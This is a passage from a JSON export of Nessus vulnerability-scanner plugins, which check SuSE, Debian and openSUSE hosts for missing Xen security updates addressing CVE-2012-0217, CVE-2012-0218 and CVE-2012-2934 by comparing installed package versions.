value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) 
flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-devel-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-html-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-pdf-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-doc-ps-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-debug-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-default-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-kdump-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-kmp-smp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-libs-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-domU-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"xen-tools-ioemu-3.2.3_17040_38-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-bigsmp-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-kdumppae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmi-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"i586\", reference:\"xen-kmp-vmipae-3.2.3_17040_38_2.6.16.60_0.97.1-0.11.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", 
reference:\"xen-libs-32bit-3.2.3_17040_38-0.11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:36:13", "description": "Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. (CVE-2012-0218)\n\nThe third fix is changing the Xen behaviour on certain hardware :\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package\n\n This issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64-bit guest systems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n 
until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... in this example represents the existing boot\n options for the host.", "edition": 18, "published": "2013-01-25T00:00:00", "title": "SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2013-01-25T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:xen-tools", "p-cpe:/a:novell:suse_linux:11:xen-tools-domU", "p-cpe:/a:novell:suse_linux:11:xen-kmp-trace", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:xen", "p-cpe:/a:novell:suse_linux:11:xen-doc-pdf", "p-cpe:/a:novell:suse_linux:11:xen-doc-html", "p-cpe:/a:novell:suse_linux:11:xen-kmp-pae", "p-cpe:/a:novell:suse_linux:11:xen-libs", "p-cpe:/a:novell:suse_linux:11:xen-kmp-default"], "id": "SUSE_11_XEN-201206-120606.NASL", "href": "https://www.tenable.com/plugins/nessus/64233", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64233);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"SuSE 11.1 Security Update : Xen (SAT Patch Number 6399)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Three security issues were found in XEN.\n\nTwo security issues are fixed by this update :\n\n - Due to incorrect fault handling in the XEN hypervisor it\n was possible for a XEN guest domain administrator to\n execute code in the XEN host environment.\n (CVE-2012-0217)\n\n - Also a guest user could crash the guest XEN kernel due\n to a protection fault bounce. The third fix is changing\n the Xen behaviour on certain hardware:. (CVE-2012-0218)\n\n - The issue is a denial of service issue on older pre-SVM\n AMD CPUs (AMD Erratum 121). 
AMD Erratum #121 is\n described in 'Revision Guide for AMD Athlon 64 and AMD\n Opteron Processors':\n http://support.amd.com/us/Processor_TechDocs/25759.pdf.\n (CVE-2012-2934)\n\n The following 130nm and 90nm (DDR1-only) AMD processors\n are subject to this erratum :\n\n - First-generation AMD-Opteron(tm) single and dual core\n processors in either 939 or 940 packages :\n\n - AMD Opteron(tm) 100-Series Processors\n\n - AMD Opteron(tm) 200-Series Processors\n\n - AMD Opteron(tm) 800-Series Processors\n\n - AMD Athlon(tm) processors in either 754, 939 or 940\n packages\n\n - AMD Sempron(tm) processor in either 754 or 939 packages\n\n - AMD Turion(tm) Mobile Technology in 754 package. This\n issue does not affect Intel processors.\n\n The impact of this flaw is that a malicious PV guest\n user can halt the host system.\n\n As this is a hardware flaw, it is not fixable except by\n upgrading your hardware to a newer revision, or not\n allowing untrusted 64bit guest systems.\n\n The patch changes the behaviour of the host system\n booting, which makes it unable to create guest machines\n until a specific boot option is set.\n\n There is a new XEN boot option 'allow_unsafe' for GRUB\n which allows the host to start guests again.\n\n This is added to /boot/grub/menu.lst in the line looking\n like this :\n\n kernel /boot/xen.gz .... allow_unsafe\n\n Note: .... 
in this example represents the existing boot\n options for the host.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0217.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-0218.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-2934.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 6399.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-doc-pdf\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-kmp-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 1) audit(AUDIT_OS_NOT, \"SuSE 11.1\");\n\n\nflag = 0;\nif 
(rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-pae-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif 
(rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"i586\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-html-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-doc-pdf-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-default-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-kmp-trace-4.0.3_21548_04_2.6.32.59_0.5-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-libs-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-4.0.3_21548_04-0.9.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"xen-tools-domU-4.0.3_21548_04-0.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:47:32", "description": "Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. 
AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.", "edition": 18, "published": "2012-06-29T00:00:00", "title": "Debian DSA-2501-1 : xen - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2012-06-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:xen"], "id": "DEBIAN_DSA-2501.NASL", "href": "https://www.tenable.com/plugins/nessus/59779", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2501. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59779);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n script_bugtraq_id(53856, 53955, 53961);\n script_xref(name:\"DSA\", value:\"2501\");\n\n script_name(english:\"Debian DSA-2501-1 : xen - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in Xen, a hypervisor.\n\n - CVE-2012-0217\n Xen does not properly handle uncanonical return\n addresses on Intel amd64 CPUs, allowing amd64 PV guests\n to elevate to hypervisor privileges. 
AMD processors, HVM\n and i386 guests are not affected.\n\n - CVE-2012-0218\n Xen does not properly handle SYSCALL and SYSENTER\n instructions in PV guests, allowing unprivileged users\n inside a guest system to crash the guest system.\n\n - CVE-2012-2934\n Xen does not detect old AMD CPUs affected by AMD Erratum\n #121.\n\nFor CVE-2012-2934, Xen refuses to start domUs on affected systems\nunless the 'allow_unsafe' option is passed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-0218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2012-2934\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/xen\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the xen packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 4.0.1-5.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libxen-dev\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libxenstore3.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-docs-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-amd64\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xen-hypervisor-4.0-i386\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"xen-utils-4.0\", reference:\"4.0.1-5.2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"xenstore-utils\", reference:\"4.0.1-5.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:03", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 17, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-2012-404)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default"], "id": "OPENSUSE-2012-404.NASL", "href": "https://www.tenable.com/plugins/nessus/74683", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE 
Security Update openSUSE-2012-404.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(74683);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2012-0029\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-2012-404)\");\n script_summary(english:\"Check for the openSUSE-2012-404 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=683580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=691256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=694863\"\n );\n script_set_attribute(\n 